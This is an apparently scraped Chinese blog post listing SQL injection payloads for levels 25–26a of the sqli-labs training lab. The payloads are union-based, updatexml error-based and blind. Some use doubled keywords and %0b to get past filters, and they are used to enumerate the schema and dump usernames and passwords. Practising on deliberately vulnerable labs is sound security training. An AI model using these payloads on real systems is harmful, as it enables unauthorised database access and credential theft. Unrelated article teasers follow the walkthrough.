sqllibs 25-26关payload

2024-04-25 22:28
文章标签 25 26 payload sqllibs

本文主要是介绍sqllibs 25-26关payload,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

前言

Less-25

Less-25a

Less-26(报错注入)

Less-26(联合注入)

Less-26a(爆破注入)

Less-26a(联合注入)


前言

方法不止一种,在此只列出部分方法。

Less-25(使用联合注入)

查库名

?id=-1' union select 1,user(),database()--+

查表名

?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+

查列名

?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users'--+

查用户名、密码

?id=-1' union select 1,group_concat(username),group_concat(passwoorrd) from users--+

Less-25a(使用联合注入)

查库名

?id=-1 union select 1,user(),database()

查表名

?id=-1 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'

查列名

?id=-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users'

查用户名、密码

?id=-1 union select 1,group_concat(username),group_concat(passwoorrd) from users--+

Less-26(使用报错注入)

查库名

?id=' || updatexml(1,(select (concat(0x7e,database(),0x7e))),1) ||'

查表名

?id=' || updatexml(1,concat(0x7e,(select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema='security')),0x7e),1) ||'

查列名

?id=' || updatexml(1,mid(concat(0x7e,(select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name='users')),0x7e),45,30),1) ||'

查用户名、密码

?id=' || updatexml(1,concat(0x7e,(select (group_concat(username,'==',passwoorrd)) from (users) where (id=1)),0x7e),1) ||'

或者使用concat_ws

?id=' || updatexml(1,concat(0x7e,(select (group_concat(concat_ws('=',username,passwoorrd))) from (users) where (id=1)),0x7e),1) ||'

Less-26(使用联合注入)

查库名

?id=0'%0bunion %0bselect %0b1,database(),user()%0b'1

查表名

?id=0'%0bunion %0bselect %0b1,database(),(select%0bgroup_concat(table_name)from

(infoorrmation_schema.tables)where(table_schema='security'))%0b'1

查列名

?id=0'%0bunion %0bselect %0b1,database(),(select%0bgroup_concat(column_name)from

(infoorrmation_schema.columns)where(table_name='users'))%0b'1

查用户名、密码

?id=0'%0bunion %0bselect %0b1,(select%0bgroup_concat(username)from(users)),(select%0bgroup_concat(passwoorrd)from(users))%0b'1

Less-26a(使用爆破注入)

查库长度

?id=-1') anandd (length(user())=14) || ('

爆破库名

?id=-1') anandd (ascii(substr(user(),1,1))=114) || ('

Less-26a(使用联合注入)

查库名

?id=0')%0b union%0bselect%0b1,database(),3%0b oorr%0b('   

查表名

?id=0')%0b union%0bselect%0b1,(select%0bgroup_concat(table_name) from (infoorrmation_schema.tables) where (table_schema='security')),3%0b oorr%0b('

查列名

?id=0')%0b union%0bselect%0b1,(select%0bgroup_concat(column_name) from (infoorrmation_schema.columns) where (table_name='users')),3%0b oorr%0b('

查用户名、密码

?id=0')%0b union%0bselect%0b1,(select%0bconcat(username,'==',passwoorrd)%0bfrom%0busers%0blimit%0b0,1),3%0b oorr%0b('   

这篇关于sqllibs 25-26关payload的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/935955

相关文章

【JavaScript】LeetCode:21-25

文章目录 21 最大子数组和22 合并区间23 轮转数组24 除自身以外数组的乘积25 缺失的第一个正数 21 最大子数组和 贪心 / 动态规划贪心:连续和(count)< 0时,放弃当前起点的连续和,将下一个数作为新起点,这里提供使用贪心算法解决本题的代码。动态规划:dp[i]:以nums[i]为结尾的最长连续子序列(子数组)和。 dp[i] = max(dp[i - 1]

2025年25届计算机毕业设计:如何实现高校实验室Java SpringBoot教学管理系统

✍✍计算机毕业编程指导师** ⭐⭐个人介绍:自己非常喜欢研究技术问题!专业做Java、Python、微信小程序、安卓、大数据、爬虫、Golang、大屏等实战项目。 ⛽⛽实战项目:有源码或者技术上的问题欢迎在评论区一起讨论交流! ⚡⚡ Java、Python、微信小程序、大数据实战项目集 ⚡⚡文末获取源码 文章目录 ⚡⚡文末获取源码高校实验室教学管理系统-研究背景高校实验室教学管理系

智力题:25匹马5条跑道找最快的3匹马,最少需要跑几次?

要找出25匹马中最快的3匹马,使用5条跑道,最少需要跑几次?我们可以通过逐步推理来解决这个问题。 第一步:分组比赛 首先,我们将25匹马分成5组,每组5匹马。每组进行一次比赛,这样我们就有5次比赛的结果。 组1:A1, A2, A3, A4, A5 组2:B1, B2, B3, B4, B5 组3:C1, C2, C3, C4, C5 组4:D1, D2, D3, D4, D5 组

芬兰手游业25年发展史

自2010年Rovio凭借《愤怒的小鸟》成功以来,芬兰的优秀开发者可以说是不断的引领手游潮流,有Frogmid、Seriously这样的小型团队,也有Supercell这样的世界收入冠军。除却收入之外,我们可以发现芬兰开发商的手游绝大多数都是具有独特创意的。 为什么芬兰手游业可以具有如此之大的竞争优势?其他人想要赶上应该怎么做?这个答案从来都不是能够简单作答的,因为它根植于芬兰的行业发展史,所以

【python 爬虫】python如何以request payload形式发送post请求

普通的http的post请求的请求content-type类型是:Content-Type:application/x-www-form-urlencoded, 而另外一种形式request payload,其Content-Type为application/json import jsonurl = 'https://api.github.com/some/endpoint'payload

每日一题~cf 970 div3 (A思维,B小模拟,C二分,D排列数建图成环,E 26个字母暴力+前缀和,F 逆元,G 数论gcd )

A 题意: 有 a 个1 ,b 个2.问是否能将这些数划分为两个数值相等的集合。 输出 YES 或者 NO —————— 问题等价于 将数组 分成两个数值相同的数组。所以sum 应该是偶数。也就是说 1 的个数是偶数。在i1的个数是偶数的情况下,将 2 分成两份,如果2 的个数是偶数,OK。如果是奇数那么需要1来补齐,如果1 的个数大于等于2那么可以补齐。(1 的个数是偶数,需要2个1来补齐,剩下

图形API学习工程(25):实现法线贴图

工程GIT地址:https://gitee.com/yaksue/yaksue-graphics 目标 在《图形API学习工程(10):基础光照》中,我实现了最基础的光照,同时也表现了法线的作用。 在《图形API学习工程(11):使用纹理》中,工程已经能够加载纹理贴图。 这样,法线贴图 所需的准备已经完成,可以在工程里实现这个技术了。 (关于法线贴图的意义,可见上一篇博客《从“法线贴图的意义

【简历】25届南京某一本JAVA简历:简历通过率还好,但是拿不到OFFER

注:为保证用户信息安全,姓名和学校等信息已经进行同层次变更,内容部分细节也进行了部分隐藏 简历说明 今天看一份25届南京某一本大学的Java简历。 这个简历呢,学校是一本。我们说上来先要定校招层次,这个层次就按照中厂来讲。因为现在很多的双非一本目标都是在中厂。 这个同学有个实习经历,一本有八成的同学主项目都是重复的。HR他只能看到项目重不重复,要点对不对他不知道,就从这个角度来看,这位同学

26 页高清大数据开发代码速查表,提升效率必备!【可下载】

各大互联网公司高价抢夺数据人才,为谋求长期发展、获得高薪,很多人转行到了大数据领域。这条路人才虽缺,但要成为优秀大数据工程师并不轻松:别的不说,光学习新技术,巩固旧知识,就需要耗费大量时间精力,实属不易。 为帮助大家提高学习效率,方便日后查找和使用,这里整理了一份大数据开发代码速查表资料,内容包括 Spark、Hadoop 及 Hive 等大数据开发主要知识点。 由于篇幅原因,下面只展示了速查表

26 页高清分布式集群代码速查表,提升效率必备!【可下载】

各大互联网公司高价抢夺海量数据处理、分布式系统开发人才,为谋求长期发展、获得高薪,很多人转行到了大数据、分布式、集群运维领域。这条路人才虽缺,但并不轻松:别的不说,光学习新技术,巩固旧知识,就需要耗费大量时间精力,实属不易。 为帮助大家提高学习和工作效率,方便日后查找和使用其中涉及的知识点,这里整理了一份分布式/集群开发、运维的代码速查表资料,内容包括 Spark、Hadoop 及 Hive 等